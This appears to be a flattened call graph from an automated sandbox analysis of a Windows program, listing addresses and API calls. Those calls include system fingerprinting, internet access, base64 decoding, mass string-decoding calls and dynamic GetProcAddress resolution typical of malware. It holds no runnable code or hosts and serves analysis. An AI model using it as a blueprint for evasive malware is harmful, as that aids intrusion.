API calls 13817->13818 13819 475d0a 13818->13819 13820 47a8a0 lstrcpy 13819->13820 13821 475d16 13820->13821 13822 47a9b0 4 API calls 13821->13822 13823 475d3a 13822->13823 13824 47a8a0 lstrcpy 13823->13824 13825 475d46 13824->13825 13826 47a9b0 4 API calls 13825->13826 13827 475d6a 13826->13827 13828 47a8a0 lstrcpy 13827->13828 13829 475d76 13828->13829 13830 47a740 lstrcpy 13829->13830 13831 475d9e 13830->13831 14761 477500 GetWindowsDirectoryA 13831->14761 13834 47a7a0 lstrcpy 13835 475db8 13834->13835 14771 464880 13835->14771 13837 475dbe 14916 4717a0 13837->14916 13839 475dc6 13840 47a740 lstrcpy 13839->13840 13841 475de9 13840->13841 13842 461590 lstrcpy 13841->13842 13843 475dfd 13842->13843 14932 465960 13843->14932 13845 475e03 15076 471050 13845->15076 13847 475e0e 13848 47a740 lstrcpy 13847->13848 13849 475e32 13848->13849 13850 461590 lstrcpy 13849->13850 13851 475e46 13850->13851 13852 465960 34 API calls 13851->13852 13853 475e4c 13852->13853 15080 470d90 13853->15080 13855 475e57 13856 47a740 lstrcpy 13855->13856 13857 475e79 13856->13857 13858 461590 lstrcpy 13857->13858 13859 475e8d 13858->13859 13860 465960 34 API calls 13859->13860 13861 475e93 13860->13861 15087 470f40 13861->15087 13863 475e9e 13864 461590 lstrcpy 13863->13864 13865 475eb5 13864->13865 15092 471a10 13865->15092 13867 475eba 13868 47a740 lstrcpy 13867->13868 13869 475ed6 13868->13869 15436 464fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13869->15436 13871 475edb 13872 461590 lstrcpy 13871->13872 13873 475f5b 13872->13873 15443 470740 13873->15443 13875 475f60 13876 47a740 lstrcpy 13875->13876 13877 475f86 13876->13877 13878 461590 lstrcpy 13877->13878 13879 475f9a 13878->13879 13880 465960 34 API calls 13879->13880 13881 475fa0 13880->13881 13975 4645d1 RtlAllocateHeap 13974->13975 13978 464621 VirtualProtect 13975->13978 13978->13623 13979->13710 13981 4610c2 codecvt 13980->13981 13982 4610fd 13981->13982 13983 4610e2 VirtualFree 13981->13983 13982->13740 13983->13982 13985 461233 GlobalMemoryStatusEx 13984->13985 13985->13743 13986->13767 13988 47a7c2 13987->13988 13989 47a7ec 13988->13989 13990 47a7da lstrcpy 13988->13990 13989->13772 13990->13989 13992 47a740 lstrcpy 13991->13992 13993 476833 13992->13993 13994 47a9b0 4 API calls 13993->13994 13995 476845 13994->13995 13996 47a8a0 lstrcpy 13995->13996 13997 47684e 13996->13997 13998 47a9b0 4 API calls 13997->13998 13999 476867 13998->13999 14000 47a8a0 lstrcpy 13999->14000 14001 476870 14000->14001 14002 47a9b0 4 API calls 14001->14002 14003 47688a 14002->14003 14004 47a8a0 lstrcpy 14003->14004 14005 476893 14004->14005 14006 47a9b0 4 API calls 14005->14006 14007 4768ac 14006->14007 14008 47a8a0 lstrcpy 14007->14008 14009 4768b5 14008->14009 14010 47a9b0 4 API calls 14009->14010 14011 4768cf 14010->14011 14012 47a8a0 lstrcpy 14011->14012 14013 4768d8 14012->14013 14014 47a9b0 4 API calls 14013->14014 14015 4768f3 14014->14015 14016 47a8a0 lstrcpy 14015->14016 14017 4768fc 14016->14017 14018 47a7a0 lstrcpy 14017->14018 14019 476910 14018->14019 14019->13779 14021 47a812 14020->14021 14021->13782 14023 47a83f 14022->14023 14024 475b54 14023->14024 14025 47a87b lstrcpy 14023->14025 14024->13792 14025->14024 14027 47a8a0 lstrcpy 14026->14027 14028 476443 14027->14028 14029 47a8a0 lstrcpy 14028->14029 14030 476455 14029->14030 14031 47a8a0 lstrcpy 14030->14031 14032 476467 14031->14032 14033 47a8a0 lstrcpy 14032->14033 14034 475b86 14033->14034 14034->13798 14036 4645c0 2 API calls 14035->14036 14037 4626b4 14036->14037 14038 4645c0 2 API calls 14037->14038 14039 4626d7 14038->14039 14040 4645c0 2 API calls 14039->14040 14041 4626f0 14040->14041 14042 4645c0 2 API calls 14041->14042 14043 462709 14042->14043 14044 4645c0 2 API calls 14043->14044 14045 462736 14044->14045 14046 4645c0 2 API calls 14045->14046 14047 46274f 14046->14047 14048 4645c0 2 API calls 14047->14048 14049 462768 14048->14049 14050 4645c0 2 API calls 14049->14050 14051 462795 14050->14051 14052 4645c0 2 API calls 14051->14052 14053 4627ae 14052->14053 14054 4645c0 2 API calls 14053->14054 14055 4627c7 14054->14055 14056 4645c0 2 API calls 14055->14056 14057 4627e0 14056->14057 14058 4645c0 2 API calls 14057->14058 14059 4627f9 14058->14059 14060 4645c0 2 API calls 14059->14060 14061 462812 14060->14061 14062 4645c0 2 API calls 14061->14062 14063 46282b 14062->14063 14064 4645c0 2 API calls 14063->14064 14065 462844 14064->14065 14066 4645c0 2 API calls 14065->14066 14067 46285d 14066->14067 14068 4645c0 2 API calls 14067->14068 14069 462876 14068->14069 14070 4645c0 2 API calls 14069->14070 14071 46288f 14070->14071 14072 4645c0 2 API calls 14071->14072 14073 4628a8 14072->14073 14074 4645c0 2 API calls 14073->14074 14075 4628c1 14074->14075 14076 4645c0 2 API calls 14075->14076 14077 4628da 14076->14077 14078 4645c0 2 API calls 14077->14078 14079 4628f3 14078->14079 14080 4645c0 2 API calls 14079->14080 14081 46290c 14080->14081 14082 4645c0 2 API calls 14081->14082 14083 462925 14082->14083 14084 4645c0 2 API calls 14083->14084 14085 46293e 14084->14085 14086 4645c0 2 API calls 14085->14086 14087 462957 14086->14087 14088 4645c0 2 API calls 14087->14088 14089 462970 14088->14089 14090 4645c0 2 API calls 14089->14090 14091 462989 14090->14091 14092 4645c0 2 API calls 14091->14092 14093 4629a2 14092->14093 14094 4645c0 2 API calls 14093->14094 14095 4629bb 14094->14095 14096 4645c0 2 API calls 14095->14096 14097 4629d4 14096->14097 14098 4645c0 2 API calls 14097->14098 14099 4629ed 14098->14099 14100 4645c0 2 API calls 14099->14100 14101 462a06 14100->14101 14102 4645c0 2 API calls 14101->14102 14103 462a1f 14102->14103 14104 4645c0 2 API calls 14103->14104 14105 462a38 14104->14105 14106 4645c0 2 API calls 14105->14106 14107 462a51 14106->14107 14108 4645c0 2 API calls 14107->14108 14109 462a6a 14108->14109 14110 4645c0 2 API calls 14109->14110 14111 462a83 14110->14111 14112 4645c0 2 API calls 14111->14112 14113 462a9c 14112->14113 14114 4645c0 2 API calls 14113->14114 14115 462ab5 14114->14115 14116 4645c0 2 API calls 14115->14116 14117 462ace 14116->14117 14118 4645c0 2 API calls 14117->14118 14119 462ae7 14118->14119 14120 4645c0 2 API calls 14119->14120 14121 462b00 14120->14121 14122 4645c0 2 API calls 14121->14122 14123 462b19 14122->14123 14124 4645c0 2 API calls 14123->14124 14125 462b32 14124->14125 14126 4645c0 2 API calls 14125->14126 14127 462b4b 14126->14127 14128 4645c0 2 API calls 14127->14128 14129 462b64 14128->14129 14130 4645c0 2 API calls 14129->14130 14131 462b7d 14130->14131 14132 4645c0 2 API calls 14131->14132 14133 462b96 14132->14133 14134 4645c0 2 API calls 14133->14134 14135 462baf 14134->14135 14136 4645c0 2 API calls 14135->14136 14137 462bc8 14136->14137 14138 4645c0 2 API calls 14137->14138 14139 462be1 14138->14139 14140 4645c0 2 API calls 14139->14140 14141 462bfa 14140->14141 14142 4645c0 2 API calls 14141->14142 14143 462c13 14142->14143 14144 4645c0 2 API calls 14143->14144 14145 462c2c 14144->14145 14146 4645c0 2 API calls 14145->14146 14147 462c45 14146->14147 14148 4645c0 2 API calls 14147->14148 14149 462c5e 14148->14149 14150 4645c0 2 API calls 14149->14150 14151 462c77 14150->14151 14152 4645c0 2 API calls 14151->14152 14153 462c90 14152->14153 14154 4645c0 2 API calls 14153->14154 14155 462ca9 14154->14155 14156 4645c0 2 API calls 14155->14156 14157 462cc2 14156->14157 14158 4645c0 2 API calls 14157->14158 14159 462cdb 14158->14159 14160 4645c0 2 API calls 14159->14160 14161 462cf4 14160->14161 14162 4645c0 2 API calls 14161->14162 14163 462d0d 14162->14163 14164 4645c0 2 API calls 14163->14164 14165 462d26 14164->14165 14166 4645c0 2 API calls 14165->14166 14167 462d3f 14166->14167 14168 4645c0 2 API calls 14167->14168 14169 462d58 14168->14169 14170 4645c0 2 API calls 14169->14170 14171 462d71 14170->14171 14172 4645c0 2 API calls 14171->14172 14173 462d8a 14172->14173 14174 4645c0 2 API calls 14173->14174 14175 462da3 14174->14175 14176 4645c0 2 API calls 14175->14176 14177 462dbc 14176->14177 14178 4645c0 2 API calls 14177->14178 14179 462dd5 14178->14179 14180 4645c0 2 API calls 14179->14180 14181 462dee 14180->14181 14182 4645c0 2 API calls 14181->14182 14183 462e07 14182->14183 14184 4645c0 2 API calls 14183->14184 14185 462e20 14184->14185 14186 4645c0 2 API calls 14185->14186 14187 462e39 14186->14187 14188 4645c0 2 API calls 14187->14188 14189 462e52 14188->14189 14190 4645c0 2 API calls 14189->14190 14191 462e6b 14190->14191 14192 4645c0 2 API calls 14191->14192 14193 462e84 14192->14193 14194 4645c0 2 API calls 14193->14194 14195 462e9d 14194->14195 14196 4645c0 2 API calls 14195->14196 14197 462eb6 14196->14197 14198 4645c0 2 API calls 14197->14198 14199 462ecf 14198->14199 14200 4645c0 2 API calls 14199->14200 14201 462ee8 14200->14201 14202 4645c0 2 API calls 14201->14202 14203 462f01 14202->14203 14204 4645c0 2 API calls 14203->14204 14205 462f1a 14204->14205 14206 4645c0 2 API calls 14205->14206 14207 462f33 14206->14207 14208 4645c0 2 API calls 14207->14208 14209 462f4c 14208->14209 14210 4645c0 2 API calls 14209->14210 14211 462f65 14210->14211 14212 4645c0 2 API calls 14211->14212 14213 462f7e 14212->14213 14214 4645c0 2 API calls 14213->14214 14215 462f97 14214->14215 14216 4645c0 2 API calls 14215->14216 14217 462fb0 14216->14217 14218 4645c0 2 API calls 14217->14218 14219 462fc9 14218->14219 14220 4645c0 2 API calls 14219->14220 14221 462fe2 14220->14221 14222 4645c0 2 API calls 14221->14222 14223 462ffb 14222->14223 14224 4645c0 2 API calls 14223->14224 14225 463014 14224->14225 14226 4645c0 2 API calls 14225->14226 14227 46302d 14226->14227 14228 4645c0 2 API calls 14227->14228 14229 463046 14228->14229 14230 4645c0 2 API calls 14229->14230 14231 46305f 14230->14231 14232 4645c0 2 API calls 14231->14232 14233 463078 14232->14233 14234 4645c0 2 API calls 14233->14234 14235 463091 14234->14235 14236 4645c0 2 API calls 14235->14236 14237 4630aa 14236->14237 14238 4645c0 2 API calls 14237->14238 14239 4630c3 14238->14239 14240 4645c0 2 API calls 14239->14240 14241 4630dc 14240->14241 14242 4645c0 2 API calls 14241->14242 14243 4630f5 14242->14243 14244 4645c0 2 API calls 14243->14244 14245 46310e 14244->14245 14246 4645c0 2 API calls 14245->14246 14247 463127 14246->14247 14248 4645c0 2 API calls 14247->14248 14249 463140 14248->14249 14250 4645c0 2 API calls 14249->14250 14251 463159 14250->14251 14252 4645c0 2 API calls 14251->14252 14253 463172 14252->14253 14254 4645c0 2 API calls 14253->14254 14255 46318b 14254->14255 14256 4645c0 2 API calls 14255->14256 14257 4631a4 14256->14257 14258 4645c0 2 API calls 14257->14258 14259 4631bd 14258->14259 14260 4645c0 2 API calls 14259->14260 14261 4631d6 14260->14261 14262 4645c0 2 API calls 14261->14262 14263 4631ef 14262->14263 14264 4645c0 2 API calls 14263->14264 14265 463208 14264->14265 14266 4645c0 2 API calls 14265->14266 14267 463221 14266->14267 14268 4645c0 2 API calls 14267->14268 14269 46323a 14268->14269 14270 4645c0 2 API calls 14269->14270 14271 463253 14270->14271 14272 4645c0 2 API calls 14271->14272 14273 46326c 14272->14273 14274 4645c0 2 API calls 14273->14274 14275 463285 14274->14275 14276 4645c0 2 API calls 14275->14276 14277 46329e 14276->14277 14278 4645c0 2 API calls 14277->14278 14279 4632b7 14278->14279 14280 4645c0 2 API calls 14279->14280 14281 4632d0 14280->14281 14282 4645c0 2 API calls 14281->14282 14283 4632e9 14282->14283 14284 4645c0 2 API calls 14283->14284 14285 463302 14284->14285 14286 4645c0 2 API calls 14285->14286 14287 46331b 14286->14287 14288 4645c0 2 API calls 14287->14288 14289 463334 14288->14289 14290 4645c0 2 API calls 14289->14290 14291 46334d 14290->14291 14292 4645c0 2 API calls 14291->14292 14293 463366 14292->14293 14294 4645c0 2 API calls 14293->14294 14295 46337f 14294->14295 14296 4645c0 2 API calls 14295->14296 14297 463398 14296->14297 14298 4645c0 2 API calls 14297->14298 14299 4633b1 14298->14299 14300 4645c0 2 API calls 14299->14300 14301 4633ca 14300->14301 14302 4645c0 2 API calls 14301->14302 14303 4633e3 14302->14303 14304 4645c0 2 API calls 14303->14304 14305 4633fc 14304->14305 14306 4645c0 2 API calls 14305->14306 14307 463415 14306->14307 14308 4645c0 2 API calls 14307->14308 14309 46342e 14308->14309 14310 4645c0 2 API calls 14309->14310 14311 463447 14310->14311 14312 4645c0 2 API calls 14311->14312 14313 463460 14312->14313 14314 4645c0 2 API calls 14313->14314 14315 463479 14314->14315 14316 4645c0 2 API calls 14315->14316 14317 463492 14316->14317 14318 4645c0 2 API calls 14317->14318 14319 4634ab 14318->14319 14320 4645c0 2 API calls 14319->14320 14321 4634c4 14320->14321 14322 4645c0 2 API calls 14321->14322 14323 4634dd 14322->14323 14324 4645c0 2 API calls 14323->14324 14325 4634f6 14324->14325 14326 4645c0 2 API calls 14325->14326 14327 46350f 14326->14327 14328 4645c0 2 API calls 14327->14328 14329 463528 14328->14329 14330 4645c0 2 API calls 14329->14330 14331 463541 14330->14331 14332 4645c0 2 API calls 14331->14332 14333 46355a 14332->14333 14334 4645c0 2 API calls 14333->14334 14335 463573 14334->14335 14336 4645c0 2 API calls 14335->14336 14337 46358c 14336->14337 14338 4645c0 2 API calls 14337->14338 14339 4635a5 14338->14339 14340 4645c0 2 API calls 14339->14340 14341 4635be 14340->14341 14342 4645c0 2 API calls 14341->14342 14343 4635d7 14342->14343 14344 4645c0 2 API calls 14343->14344 14345 4635f0 14344->14345 14346 4645c0 2 API calls 14345->14346 14347 463609 14346->14347 14348 4645c0 2 API calls 14347->14348 14349 463622 14348->14349 14350 4645c0 2 API calls 14349->14350 14351 46363b 14350->14351 14352 4645c0 2 API calls 14351->14352 14353 463654 14352->14353 14354 4645c0 2 API calls 14353->14354 14355 46366d 14354->14355 14356 4645c0 2 API calls 14355->14356 14357 463686 14356->14357 14358 4645c0 2 API calls 14357->14358 14359 46369f 14358->14359 14360 4645c0 2 API calls 14359->14360 14361 4636b8 14360->14361 14362 4645c0 2 API calls 14361->14362 14363 4636d1 14362->14363 14364 4645c0 2 API calls 14363->14364 14365 4636ea 14364->14365 14366 4645c0 2 API calls 14365->14366 14367 463703 14366->14367 14368 4645c0 2 API calls 14367->14368 14369 46371c 14368->14369 14370 4645c0 2 API calls 14369->14370 14371 463735 14370->14371 14372 4645c0 2 API calls 14371->14372 14373 46374e 14372->14373 14374 4645c0 2 API calls 14373->14374 14375 463767 14374->14375 14376 4645c0 2 API calls 14375->14376 14377 463780 14376->14377 14378 4645c0 2 API calls 14377->14378 14379 463799 14378->14379 14380 4645c0 2 API calls 14379->14380 14381 4637b2 14380->14381 14382 4645c0 2 API calls 14381->14382 14383 4637cb 14382->14383 14384 4645c0 2 API calls 14383->14384 14385 4637e4 14384->14385 14386 4645c0 2 API calls 14385->14386 14387 4637fd 14386->14387 14388 4645c0 2 API calls 14387->14388 14389 463816 14388->14389 14390 4645c0 2 API calls 14389->14390 14391 46382f 14390->14391 14392 4645c0 2 API calls 14391->14392 14393 463848 14392->14393 14394 4645c0 2 API calls 14393->14394 14395 463861 14394->14395 14396 4645c0 2 API calls 14395->14396 14397 46387a 14396->14397 14398 4645c0 2 API calls 14397->14398 14399 463893 14398->14399 14400 4645c0 2 API calls 14399->14400 14401 4638ac 14400->14401 14402 4645c0 2 API calls 14401->14402 14403 4638c5 14402->14403 14404 4645c0 2 API calls 14403->14404 14405 4638de 14404->14405 14406 4645c0 2 API calls 14405->14406 14407 4638f7 14406->14407 14408 4645c0 2 API calls 14407->14408 14409 463910 14408->14409 14410 4645c0 2 API calls 14409->14410 14411 463929 14410->14411 14412 4645c0 2 API calls 14411->14412 14413 463942 14412->14413 14414 4645c0 2 API calls 14413->14414 14415 46395b 14414->14415 14416 4645c0 2 API calls 14415->14416 14417 463974 14416->14417 14418 4645c0 2 API calls 14417->14418 14419 46398d 14418->14419 14420 4645c0 2 API calls 14419->14420 14421 4639a6 14420->14421 14422 4645c0 2 API calls 14421->14422 14423 4639bf 14422->14423 14424 4645c0 2 API calls 14423->14424 14425 4639d8 14424->14425 14426 4645c0 2 API calls 14425->14426 14427 4639f1 14426->14427 14428 4645c0 2 API calls 14427->14428 14429 463a0a 14428->14429 14430 4645c0 2 API calls 14429->14430 14431 463a23 14430->14431 14432 4645c0 2 API calls 14431->14432 14433 463a3c 14432->14433 14434 4645c0 2 API calls 14433->14434 14435 463a55 14434->14435 14436 4645c0 2 API calls 14435->14436 14437 463a6e 14436->14437 14438 4645c0 2 API calls 14437->14438 14439 463a87 14438->14439 14440 4645c0 2 API calls 14439->14440 14441 463aa0 14440->14441 14442 4645c0 2 API calls 14441->14442 14443 463ab9 14442->14443 14444 4645c0 2 API calls 14443->14444 14445 463ad2 14444->14445 14446 4645c0 2 API calls 14445->14446 14447 463aeb 14446->14447 14448 4645c0 2 API calls 14447->14448 14449 463b04 14448->14449 14450 4645c0 2 API calls 14449->14450 14451 463b1d 14450->14451 14452 4645c0 2 API calls 14451->14452 14453 463b36 14452->14453 14454 4645c0 2 API calls 14453->14454 14455 463b4f 14454->14455 14456 4645c0 2 API calls 14455->14456 14457 463b68 14456->14457 14458 4645c0 2 API calls 14457->14458 14459 463b81 14458->14459 14460 4645c0 2 API calls 14459->14460 14461 463b9a 14460->14461 14462 4645c0 2 API calls 14461->14462 14463 463bb3 14462->14463 14464 4645c0 2 API calls 14463->14464 14465 463bcc 14464->14465 14466 4645c0 2 API calls 14465->14466 14467 463be5 14466->14467 14468 4645c0 2 API calls 14467->14468 14469 463bfe 14468->14469 14470 4645c0 2 API calls 14469->14470 14471 463c17 14470->14471 14472 4645c0 2 API calls 14471->14472 14473 463c30 14472->14473 14474 4645c0 2 API calls 14473->14474 14475 463c49 14474->14475 14476 4645c0 2 API calls 14475->14476 14477 463c62 14476->14477 14478 4645c0 2 API calls 14477->14478 14479 463c7b 14478->14479 14480 4645c0 2 API calls 14479->14480 14481 463c94 14480->14481 14482 4645c0 2 API calls 14481->14482 14483 463cad 14482->14483 14484 4645c0 2 API calls 14483->14484 14485 463cc6 14484->14485 14486 4645c0 2 API calls 14485->14486 14487 463cdf 14486->14487 14488 4645c0 2 API calls 14487->14488 14489 463cf8 14488->14489 14490 4645c0 2 API calls 14489->14490 14491 463d11 14490->14491 14492 4645c0 2 API calls 14491->14492 14493 463d2a 14492->14493 14494 4645c0 2 API calls 14493->14494 14495 463d43 14494->14495 14496 4645c0 2 API calls 14495->14496 14497 463d5c 14496->14497 14498 4645c0 2 API calls 14497->14498 14499 463d75 14498->14499 14500 4645c0 2 API calls 14499->14500 14501 463d8e 14500->14501 14502 4645c0 2 API calls 14501->14502 14503 463da7 14502->14503 14504 4645c0 2 API calls 14503->14504 14505 463dc0 14504->14505 14506 4645c0 2 API calls 14505->14506 14507 463dd9 14506->14507 14508 4645c0 2 API calls 14507->14508 14509 463df2 14508->14509 14510 4645c0 2 API calls 14509->14510 14511 463e0b 14510->14511 14512 4645c0 2 API calls 14511->14512 14513 463e24 14512->14513 14514 4645c0 2 API calls 14513->14514 14515 463e3d 14514->14515 14516 4645c0 2 API calls 14515->14516 14517 463e56 14516->14517 14518 4645c0 2 API calls 14517->14518 14519 463e6f 14518->14519 14520 4645c0 2 API calls 14519->14520 14521 463e88 14520->14521 14522 4645c0 2 API calls 14521->14522 14523 463ea1 14522->14523 14524 4645c0 2 API calls 14523->14524 14525 463eba 14524->14525 14526 4645c0 2 API calls 14525->14526 14527 463ed3 14526->14527 14528 4645c0 2 API calls 14527->14528 14529 463eec 14528->14529 14530 4645c0 2 API calls 14529->14530 14531 463f05 14530->14531 14532 4645c0 2 API calls 14531->14532 14533 463f1e 14532->14533 14534 4645c0 2 API calls 14533->14534 14535 463f37 14534->14535 14536 4645c0 2 API calls 14535->14536 14537 463f50 14536->14537 14538 4645c0 2 API calls 14537->14538 14539 463f69 14538->14539 14540 4645c0 2 API calls 14539->14540 14541 463f82 14540->14541 14542 4645c0 2 API calls 14541->14542 14543 463f9b 14542->14543 14544 4645c0 2 API calls 14543->14544 14545 463fb4 14544->14545 14546 4645c0 2 API calls 14545->14546 14547 463fcd 14546->14547 14548 4645c0 2 API calls 14547->14548 14549 463fe6 14548->14549 14550 4645c0 2 API calls 14549->14550 14551 463fff 14550->14551 14552 4645c0 2 API calls 14551->14552 14553 464018 14552->14553 14554 4645c0 2 API calls 14553->14554 14555 464031 14554->14555 14556 4645c0 2 API calls 14555->14556 14557 46404a 14556->14557 14558 4645c0 2 API calls 14557->14558 14559 464063 14558->14559 14560 4645c0 2 API calls 14559->14560 14561 46407c 14560->14561 14562 4645c0 2 API calls 14561->14562 14563 464095 14562->14563 14564 4645c0 2 API calls 14563->14564 14565 4640ae 14564->14565 14566 4645c0 2 API calls 14565->14566 14567 4640c7 14566->14567 14568 4645c0 2 API calls 14567->14568 14569 4640e0 14568->14569 14570 4645c0 2 API calls 14569->14570 14571 4640f9 14570->14571 14572 4645c0 2 API calls 14571->14572 14573 464112 14572->14573 14574 4645c0 2 API calls 14573->14574 14575 46412b 14574->14575 14576 4645c0 2 API calls 14575->14576 14577 464144 14576->14577 14578 4645c0 2 API calls 14577->14578 14579 46415d 14578->14579 14580 4645c0 2 API calls 14579->14580 14581 464176 14580->14581 14582 4645c0 2 API calls 14581->14582 14583 46418f 14582->14583 14584 4645c0 2 API calls 14583->14584 14585 4641a8 14584->14585 14586 4645c0 2 API calls 14585->14586 14587 4641c1 14586->14587 14588 4645c0 2 API calls 14587->14588 14589 4641da 14588->14589 14590 4645c0 2 API calls 14589->14590 14591 4641f3 14590->14591 14592 4645c0 2 API calls 14591->14592 14593 46420c 14592->14593 14594 4645c0 2 API calls 14593->14594 14595 464225 14594->14595 14596 4645c0 2 API calls 14595->14596 14597 46423e 14596->14597 14598 4645c0 2 API calls 14597->14598 14599 464257 14598->14599 14600 4645c0 2 API calls 14599->14600 14601 464270 14600->14601 14602 4645c0 2 API calls 14601->14602 14603 464289 14602->14603 14604 4645c0 2 API calls 14603->14604 14605 4642a2 14604->14605 14606 4645c0 2 API calls 14605->14606 14607 4642bb 14606->14607 14608 4645c0 2 API calls 14607->14608 14609 4642d4 14608->14609 14610 4645c0 2 API calls 14609->14610 14611 4642ed 14610->14611 14612 4645c0 2 API calls 14611->14612 14613 464306 14612->14613 14614 4645c0 2 API calls 14613->14614 14615 46431f 14614->14615 14616 4645c0 2 API calls 14615->14616 14617 464338 14616->14617 14618 4645c0 2 API calls 14617->14618 14619 464351 14618->14619 14620 4645c0 2 API calls 14619->14620 14621 46436a 14620->14621 14622 4645c0 2 API calls 14621->14622 14623 464383 14622->14623 14624 4645c0 2 API calls 14623->14624 14625 46439c 14624->14625 14626 4645c0 2 API calls 14625->14626 14627 4643b5 14626->14627 14628 4645c0 2 API calls 14627->14628 14629 4643ce 14628->14629 14630 4645c0 2 API calls 14629->14630 14631 4643e7 14630->14631 14632 4645c0 2 API calls 14631->14632 14633 464400 14632->14633 14634 4645c0 2 API calls 14633->14634 14635 464419 14634->14635 14636 4645c0 2 API calls 14635->14636 14637 464432 14636->14637 14638 4645c0 2 API calls 14637->14638 14639 46444b 14638->14639 14640 4645c0 2 API calls 14639->14640 14641 464464 14640->14641 14642 4645c0 2 API calls 14641->14642 14643 46447d 14642->14643 14644 4645c0 2 API calls 14643->14644 14645 464496 14644->14645 14646 4645c0 2 API calls 14645->14646 14647 4644af 14646->14647 14648 4645c0 2 API calls 14647->14648 14649 4644c8 14648->14649 14650 4645c0 2 API calls 14649->14650 14651 4644e1 14650->14651 14652 4645c0 2 API calls 14651->14652 14653 4644fa 14652->14653 14654 4645c0 2 API calls 14653->14654 14655 464513 14654->14655 14656 4645c0 2 API calls 14655->14656 14657 46452c 14656->14657 14658 4645c0 2 API calls 14657->14658 14659 464545 14658->14659 14660 4645c0 2 API calls 14659->14660 14661 46455e 14660->14661 14662 4645c0 2 API calls 14661->14662 14663 464577 14662->14663 14664 4645c0 2 API calls 14663->14664 14665 464590 14664->14665 14666 4645c0 2 API calls 14665->14666 14667 4645a9 14666->14667 14668 479c10 14667->14668 14669 47a036 8 API calls 14668->14669 14670 479c20 43 API calls 14668->14670 14671 47a146 14669->14671 14672 47a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14669->14672 14670->14669 14673 47a216 14671->14673 14674 47a153 8 API calls 14671->14674 14672->14671 14675 47a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14673->14675 14676 47a298 14673->14676 14674->14673 14675->14676 14677 47a337 14676->14677 14678 47a2a5 6 API calls 14676->14678 14679 47a344 9 API calls 14677->14679 14680 47a41f 14677->14680 14678->14677 14679->14680 14681 47a4a2 14680->14681 14682 47a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14680->14682 14683 47a4dc 14681->14683 14684 47a4ab GetProcAddress GetProcAddress 14681->14684 14682->14681 14685 47a515 14683->14685 14686 47a4e5 GetProcAddress GetProcAddress 14683->14686 14684->14683 14687 47a612 14685->14687 14688 47a522 10 API calls 14685->14688 14686->14685 14689 47a67d 14687->14689 14690 47a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14687->14690 14688->14687 14691 47a686 GetProcAddress 14689->14691 14692 47a69e 14689->14692 14690->14689 14691->14692 14693 47a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14692->14693 14694 475ca3 14692->14694 14693->14694 14695 461590 14694->14695 15816 461670 14695->15816 14698 47a7a0 lstrcpy 14699 4615b5 14698->14699 14700 47a7a0 lstrcpy 14699->14700 14701 4615c7 14700->14701 14702 47a7a0 lstrcpy 14701->14702 14703 4615d9 14702->14703 14704 47a7a0 lstrcpy 14703->14704 14705 461663 14704->14705 14706 475510 14705->14706 14707 475521 14706->14707 14708 47a820 2 API calls 14707->14708 14709 47552e 14708->14709 14710 47a820 2 API calls 14709->14710 14711 47553b 14710->14711 14712 47a820 2 API calls 14711->14712 14713 475548 14712->14713 14714 47a740 lstrcpy 14713->14714 14715 475555 14714->14715 14716 47a740 lstrcpy 14715->14716 14717 475562 14716->14717 14718 47a740 lstrcpy 14717->14718 14719 47556f 14718->14719 14720 47a740 lstrcpy 14719->14720 14758 47557c 14720->14758 14721 47a820 lstrlen lstrcpy 14721->14758 14722 4751f0 20 API calls 14722->14758 14723 475643 StrCmpCA 14723->14758 14724 4756a0 StrCmpCA 14726 4757dc 14724->14726 14724->14758 14725 47a7a0 lstrcpy 14725->14758 14727 47a8a0 lstrcpy 14726->14727 14728 4757e8 14727->14728 14729 47a820 2 API calls 14728->14729 14731 4757f6 14729->14731 14730 47a740 lstrcpy 14730->14758 14733 47a820 2 API calls 14731->14733 14732 475856 StrCmpCA 14734 475991 14732->14734 14732->14758 14737 475805 14733->14737 14736 47a8a0 lstrcpy 14734->14736 14735 47a8a0 lstrcpy 14735->14758 14738 47599d 14736->14738 14739 461670 lstrcpy 14737->14739 14740 47a820 2 API calls 14738->14740 14753 475811 14739->14753 14742 4759ab 14740->14742 14741 4752c0 25 API calls 14741->14758 14746 47a820 2 API calls 14742->14746 14743 475a0b StrCmpCA 14744 475a16 Sleep 14743->14744 14745 475a28 14743->14745 14744->14758 14747 47a8a0 lstrcpy 14745->14747 14748 4759ba 14746->14748 14749 475a34 14747->14749 14750 461670 lstrcpy 14748->14750 14751 47a820 2 API calls 14749->14751 14750->14753 14752 475a43 14751->14752 14754 47a820 2 API calls 14752->14754 14753->13813 14755 475a52 14754->14755 14757 461670 lstrcpy 14755->14757 14756 47578a StrCmpCA 14756->14758 14757->14753 14758->14721 14758->14722 14758->14723 14758->14724 14758->14725 14758->14730 14758->14732 14758->14735 14758->14741 14758->14743 14758->14756 14759 461590 lstrcpy 14758->14759 14760 47593f StrCmpCA 14758->14760 14759->14758 14760->14758 14762 477553 GetVolumeInformationA 14761->14762 14763 47754c 14761->14763 14765 477591 14762->14765 14763->14762 14764 4775fc GetProcessHeap RtlAllocateHeap 14766 477619 14764->14766 14767 477628 wsprintfA 14764->14767 14765->14764 14769 47a740 lstrcpy 14766->14769 14768 47a740 lstrcpy 14767->14768 14770 475da7 14768->14770 14769->14770 14770->13834 14772 47a7a0 lstrcpy 14771->14772 14773 464899 14772->14773 15825 4647b0 14773->15825 14775 4648a5 14776 47a740 lstrcpy 14775->14776 14777 4648d7 14776->14777 14778 47a740 lstrcpy 14777->14778 14779 4648e4 14778->14779 14780 47a740 lstrcpy 14779->14780 14781 4648f1 14780->14781 14782 47a740 lstrcpy 14781->14782 14783 4648fe 14782->14783 14784 47a740 lstrcpy 14783->14784 14785 46490b InternetOpenA StrCmpCA 14784->14785 14786 464944 14785->14786 14787 464ecb InternetCloseHandle 14786->14787 15831 478b60 14786->15831 14788 464ee8 14787->14788 15846 469ac0 CryptStringToBinaryA 14788->15846 14790 464963 15839 47a920 14790->15839 14793 464976 14795 47a8a0 lstrcpy 14793->14795 14800 46497f 14795->14800 14796 47a820 2 API calls 14797 464f05 14796->14797 14798 47a9b0 4 API calls 14797->14798 14801 464f1b 14798->14801 14799 464f27 codecvt 14802 47a7a0 lstrcpy 14799->14802 14804 47a9b0 4 API calls 14800->14804 14803 47a8a0 lstrcpy 14801->14803 14815 464f57 14802->14815 14803->14799 14805 4649a9 14804->14805 14806 